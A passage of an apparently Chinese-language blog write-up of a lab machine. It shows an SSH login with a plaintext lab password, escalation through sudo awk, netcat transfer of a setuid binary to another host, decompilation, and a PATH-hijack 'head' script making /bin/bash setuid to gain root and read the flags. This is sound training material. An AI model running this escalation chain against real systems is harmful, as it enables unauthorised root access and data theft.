4c6dda8a9d149332541e577b53e2a3ea    \nMary                    41ae0e6fbe90c08a63217fc964b12903    \nhecolivares             5d8cdc88039d5fc021880f9af4f7c5c3    <\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148136.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148136.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240318214155755\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>ssh\u767b\u5f55<\/h3>\n<pre><code class=\"language-apl\">pmccentral        999999999<\/code><\/pre>\n<pre><code class=\"language-bash\">ssh pmccentral@10.0.2.5<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148137.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148137.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240318214315623\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u8fdb\u6765\u4e86\uff01<\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u67e5\u770b\u57fa\u7840\u4fe1\u606f<\/h3>\n<pre><code class=\"language-bash\">pmccentral@laboratoryuser:~$ whoami;id\npmccentral\nuid=1001(pmccentral) gid=1001(pmccentral) groups=1001(pmccentral)\npmccentral@laboratoryuser:~$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/bin\/newgrp\n\/usr\/bin\/sudo\n\/usr\/bin\/su\n\/usr\/bin\/umount\n\/usr\/bin\/at\n\/usr\/bin\/chsh\n\/usr\/bin\/pkexec\n\/usr\/bin\/mount\n\/usr\/bin\/fusermount\n\/usr\/bin\/passwd\n\/usr\/bin\/gpasswd\n\/usr\/bin\/chfn\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/snapd\/snap-confine\n\/usr\/lib\/policykit-1\/polkit-agent-helper-1\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/snap\/core20\/1828\/usr\/bin\/chfn\n\/snap\/core20\/1828\/usr\/bin\/chsh\n\/snap\/core20\/1828\/usr\/bin\/gpasswd\n\/snap\/core20\/1828\/usr\/bin\/mount\n\/snap\/core20\/1828\/usr\/bin\/newgrp\n\/snap\/core20\/1828\/usr\/bin\/passwd\n\/snap\/core20\/1828\/usr\/bin\/su\n\/snap\/core20\/1828\/usr\/bin\/sudo\n\/snap\/core20\/1828\/usr\/bin\/umount\n\/snap\/core20\/1828\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/snap\/core20\/1828\/usr\/lib\/openssh\/ssh-keysign\n\/snap\/snapd\/18357\/usr\/lib\/snapd\/snap-confine\n\/snap\/snapd\/20290\/usr\/lib\/snapd\/snap-confine\npmccentral@laboratoryuser:~$ sudo -l\n[sudo] password for pmccentral: \nSorry, try again.\n[sudo] password for pmccentral: \nMatching Defaults entries for pmccentral on laboratoryuser:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser pmccentral may run the following commands on laboratoryuser:\n    (laboratoryadmin) \/usr\/bin\/awk<\/code><\/pre>\n<h3>\u5c1d\u8bd5\u63d0\u5347\u81f3laboratoryadmin<\/h3>\n<p>\u5229\u7528https:\/\/gtfobins.github.io\/gtfobins\/awk\/\u7ed9\u51fa\u7684\u65b9\u6cd5\u63d0\u6743\u5230<code>laboratoryadmin<\/code>\u7528\u6237<\/p>\n<pre><code class=\"language-bash\">sudo -u laboratoryadmin awk &#039;BEGIN {system(&quot;\/bin\/sh&quot;)}&#039;<\/code><\/pre>\n<p>\u7136\u540e\u641c\u5bfbflag\uff1a<\/p>\n<pre><code class=\"language-text\">pmccentral@laboratoryuser:~$ sudo -u laboratoryadmin awk &#039;BEGIN {system(&quot;\/bin\/sh&quot;)}&#039;\n$ whoami;id\nlaboratoryadmin\nuid=1002(laboratoryadmin) gid=1002(laboratoryadmin) groups=1002(laboratoryadmin)\n$ ls -la\ntotal 44\ndrwxr-xr-x 7 pmccentral pmccentral 4096 Dec 17 13:24 .\ndrwxr-xr-x 4 root       root       4096 Dec 17 15:34 ..\n-rw------- 1 pmccentral pmccentral  304 Dec 17 18:18 .bash_history\n-rw-r--r-- 1 pmccentral pmccentral  220 Dec 16 14:41 .bash_logout\n-rw-r--r-- 1 pmccentral pmccentral 3771 Dec 16 14:41 .bashrc\ndrwx------ 2 pmccentral pmccentral 4096 Dec 17 13:24 .cache\ndrwxrwxr-x 2 pmccentral pmccentral 4096 Dec 16 14:43 desktop\ndrwxrwxr-x 2 pmccentral pmccentral 4096 Dec 17 15:37 documents\ndrwxrwxr-x 2 pmccentral pmccentral 4096 Dec 16 14:43 downloads\ndrwxrwxr-x 3 pmccentral pmccentral 4096 Dec 16 14:42 .local\n-rw-r--r-- 1 pmccentral pmccentral  807 Dec 16 14:41 .profile\n$ cd \/home\n$ ls\nlaboratoryadmin  pmccentral\n$ cd laboratoryadmin\n$ ls -la\ntotal 52\ndrwx------ 8 laboratoryadmin laboratoryadmin 4096 Dec 18 16:15 .\ndrwxr-xr-x 4 root            root            4096 Dec 17 15:34 ..\ndrwxr-xr-x 2 laboratoryadmin laboratoryadmin 4096 Dec 18 20:16 autoScripts\n-rw------- 1 laboratoryadmin laboratoryadmin   74 Dec 18 20:17 .bash_history\n-rw-r--r-- 1 laboratoryadmin laboratoryadmin  220 Dec 17 15:29 .bash_logout\n-rw-r--r-- 1 laboratoryadmin laboratoryadmin 3771 Dec 17 15:29 .bashrc\ndrwxr-xr-x 2 laboratoryadmin laboratoryadmin 4096 Dec 17 15:34 desktop\ndrwxr-xr-x 2 laboratoryadmin laboratoryadmin 4096 Dec 17 15:34 documents\ndrwxr-xr-x 2 laboratoryadmin laboratoryadmin 4096 Dec 17 15:34 downloads\ndrwxr-xr-x 2 laboratoryadmin laboratoryadmin 4096 Dec 17 15:34 home\ndrwxrwxr-x 3 laboratoryadmin laboratoryadmin 4096 Dec 17 15:30 .local\n-rw-r--r-- 1 laboratoryadmin laboratoryadmin  807 Dec 17 15:29 .profile\n-rw-r--r-- 1 laboratoryadmin laboratoryadmin   33 Dec 18 16:15 user.txt\n$ cat user.txt\nflag{$udOeR$_Pr!V11E9E_I5_7En53}<\/code><\/pre>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/bin\/newgrp\n\/usr\/bin\/sudo\n\/usr\/bin\/su\n\/usr\/bin\/umount\n\/usr\/bin\/at\n\/usr\/bin\/chsh\n\/usr\/bin\/pkexec\n\/usr\/bin\/mount\n\/usr\/bin\/fusermount\n\/usr\/bin\/passwd\n\/usr\/bin\/gpasswd\n\/usr\/bin\/chfn\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/snapd\/snap-confine\n\/usr\/lib\/policykit-1\/polkit-agent-helper-1\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/snap\/core20\/1828\/usr\/bin\/chfn\n\/snap\/core20\/1828\/usr\/bin\/chsh\n\/snap\/core20\/1828\/usr\/bin\/gpasswd\n\/snap\/core20\/1828\/usr\/bin\/mount\n\/snap\/core20\/1828\/usr\/bin\/newgrp\n\/snap\/core20\/1828\/usr\/bin\/passwd\n\/snap\/core20\/1828\/usr\/bin\/su\n\/snap\/core20\/1828\/usr\/bin\/sudo\n\/snap\/core20\/1828\/usr\/bin\/umount\n\/snap\/core20\/1828\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/snap\/core20\/1828\/usr\/lib\/openssh\/ssh-keysign\n\/snap\/snapd\/18357\/usr\/lib\/snapd\/snap-confine\n\/snap\/snapd\/20290\/usr\/lib\/snapd\/snap-confine\n\/home\/laboratoryadmin\/autoScripts\/PMCEmployees\n$ cd \/home\/laboratoryadmin\/autoScripts\n$ file PMCEmployees\nPMCEmployees: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, BuildID[sha1]=2e8e1b3a3f1bba666df17c97871f88b0377343fb, for GNU\/Linux 3.2.0, not stripped<\/code><\/pre>\n<p>\u4e0b\u8f7d\u5230\u672c\u5730\u770b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">nc -lp 1234 &gt; head\nnc 10.0.2.4 1234 &lt; head\n\nnc -lp 1234 &gt; PMCEmployees\nnc 10.0.2.4 1234 &lt; PMCEmployees<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148138.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148138.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240319000541876\" \/><\/div><\/p>\n<pre><code class=\"language-bash\"># head\nbash -p<\/code><\/pre>\n<pre><code class=\"language-c\">\/\/ main\nint __cdecl main(int argc, const char **argv, const char **envp)\n{\n  __asm { endbr64 }\n  sub_1090(0LL, argv, envp);\n  sub_1080(&quot;Showing top 10 best employees of PMC company&quot;);\n  return sub_1070(&quot;head \/home\/pmccentral\/documents\/employees.txt&quot;);\n}<\/code><\/pre>\n<p>\u8fd9\u4e2a\u53cd\u7f16\u8bd1\u6211\u770b\u7684\u4e0d\u662f\u5f88\u61c2\uff0c\u7ee7\u7eed\u770b\u770b\uff1a<\/p>\n<pre><code class=\"language-c\">__int64 sub_1090()\n{\n  __asm { endbr64 }\n  return sub_1050();\n}<\/code><\/pre>\n<pre><code class=\"language-c\">void sub_1050()\n{\n  __asm { endbr64 }\n  sub_1020();\n}<\/code><\/pre>\n<pre><code class=\"language-c\">void sub_1020()\n{\n  JUMPOUT(&amp;dword_0);\n}<\/code><\/pre>\n<p>\u8fd9\u6c47\u7f16\u597d\u50cf\u548c\u5e08\u5085\u4eec\u8bf4\u7684\u4e0d\u592a\u4e00\u6837\uff0c\u5207\u6362\u4e00\u4e2a\u8bd5\u8bd5\uff1a<\/p>\n<pre><code class=\"language-c\">int32_t main (void) {\n    edi = 0;\n    eax = 0;\n    setuid ();\n    eax = 0;\n    printf (&quot;Showing top 10 best employees of PMC company&quot;);\n    rdi = &quot;head \/home\/pmccentral\/documents\/employees.txt&quot;;\n    eax = 0;\n    system ();\n    return eax;\n}<\/code><\/pre>\n<p>\u8fd9\u662fcutter\u7f16\u8bd1\u7684\uff0c\u548b\u602a\u602a\u7684\uff0c\u5207\u6362\u4e00\u4e2a\u53cd\u7f16\u8bd1\u5668\uff1a<\/p>\n<pre><code class=\"language-bash\">void main(void)\n{\n    setuid(0);\n    printf(&quot;Showing top 10 best employees of PMC company&quot;);\n    system(&quot;head \/home\/pmccentral\/documents\/employees.txt&quot;);\n    return;\n}<\/code><\/pre>\n<p>\u5bf9\u80c3\u4e86\uff01\u4f5c\u8005\u76f4\u63a5\u628ahead\u6454\u5728\u8138\u4e0a\u4e86\uff0c\u5c06\u5176\u6dfb\u52a0\u5230\u6700\u524d\u9762\u7684\u73af\u5883\u53d8\u91cf\u4e0a\u9762\uff0c\u8fd0\u884c\u4e00\u4e0b\u8bd5\u8bd5\uff1a<\/p>\n<pre><code>export PATH=\/home\/laboratoryadmin\/autoScripts:$PATH\n.\/PMCEmployees\nwhoami;id<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148139.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148139.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240319012752456\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5f53\u7136\uff0c\u4e5f\u4e0d\u662f\u975e\u8981\u7528\u8fd9\u4e2a\u4f5c\u8005\u7684<code>head<\/code>\uff0c\u6211\u4eec\u5b8c\u5168\u53ef\u4ee5\u81ea\u5df1\u5199\u4e00\u4e2a\uff1a<\/p>\n<pre><code class=\"language-bash\">cd \/tmp;touch head;\necho &#039;chmod +s \/bin\/bash&#039; &gt; head\nchmod +x head\nexport PATH=&quot;$PWD:$PATH&quot;\nwhich head\n# \/tmp\/head\ncd \/home\/laboratoryadmin\/autoScripts\n.\/PMCEmployees<\/code><\/pre>\n<pre><code class=\"language-bash\">pmccentral@laboratoryuser:~$ sudo -u laboratoryadmin awk &#039;BEGIN {system(&quot;\/bin\/sh&quot;)}&#039;\n[sudo] password for pmccentral: \n$ cd \/tmp;touch head;\n$ echo &quot;chmod +s \/bin\/bash&quot; &gt; head\n$ cat head\nchmod +s \/bin\/bash\n$ export $PATH= $PWD:$PATH\n\/bin\/sh: 4: export: \/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin:\/snap\/bin: bad variable name\n$ export PATH=&quot;$PWD:$PATH&quot;\n$ echo $PATH\n\/tmp:\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin:\/snap\/bin\n$ cd \/home\n$ ls\nlaboratoryadmin  pmccentral\n$ cd laboratoryadmin\/autoScripts\n$ ls\nhead  PMCEmployees\n$ .\/PMCEmployees\naren\nAarika\nAbagael\nAbagail\nAbbe\nAbbey\nAbbi\nAbbie\nAbby\nAbbye\nShowing top 10 best employees of PMC company$ ls -l \/bin\/bash\n-rwxr-xr-x 1 root root 1183448 Apr 18  2022 \/bin\/bash\n$ cd \/tmp\n$ ls\nhead\nsnap-private-tmp\nsystemd-private-6b29ca23ee0c453c8ae1cc1a0276b925-apache2.service-qkdTjh\nsystemd-private-6b29ca23ee0c453c8ae1cc1a0276b925-ModemManager.service-KJJjTh\nsystemd-private-6b29ca23ee0c453c8ae1cc1a0276b925-systemd-logind.service-Ze1uNh\nsystemd-private-6b29ca23ee0c453c8ae1cc1a0276b925-systemd-resolved.service-SAAUQf\nsystemd-private-6b29ca23ee0c453c8ae1cc1a0276b925-systemd-timesyncd.service-74TQVi\n$ rm head\n$ echo &#039;chmod +s \/bin\/bash&#039; &gt; head\n$ which head\n\/usr\/bin\/head\n$ echo $PATH\n\/tmp:\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin:\/snap\/bin\n$ ls\nhead\nsnap-private-tmp\nsystemd-private-6b29ca23ee0c453c8ae1cc1a0276b925-apache2.service-qkdTjh\nsystemd-private-6b29ca23ee0c453c8ae1cc1a0276b925-ModemManager.service-KJJjTh\nsystemd-private-6b29ca23ee0c453c8ae1cc1a0276b925-systemd-logind.service-Ze1uNh\nsystemd-private-6b29ca23ee0c453c8ae1cc1a0276b925-systemd-resolved.service-SAAUQf\nsystemd-private-6b29ca23ee0c453c8ae1cc1a0276b925-systemd-timesyncd.service-74TQVi\n$ chmod +x head\n$ which head\n\/tmp\/head\n$ cd \/home\/laboratoryadmin\/autoScripts\n$ .\/PMCEmployees\nShowing top 10 best employees of PMC company$ ls -l \/bin\/bash\n-rwsr-sr-x 1 root root 1183448 Apr 18  2022 \/bin\/bash\n$ \/bin\/bash -p\nbash-5.0# whoami;id\nroot\nuid=1002(laboratoryadmin) gid=1002(laboratoryadmin) euid=0(root) egid=0(root) groups=0(root),1002(laboratoryadmin)\nbash-5.0# cat \/root\/root.txt\nflag{r00t_t3ns0}<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>nebula \u6253\u4e0d\u5f00\uff0c\u6b63\u5e38\u7684\uff0c\u5148\u5bfc\u5165virtualbox\u518d\u8f6c\u62101.0\u683c\u5f0f\u7684\u5bfc\u51fa\u6765\uff0c\u6700\u540e\u4e22\u8fdbvmware\uff1a \u5b8c\u86cb [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,19,18],"tags":[],"class_list":["post-419","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-pwn","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/419","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=419"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/419\/revisions"}],"predecessor-version":[{"id":420,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/419\/revisions\/420"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=419"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=419"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=419"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}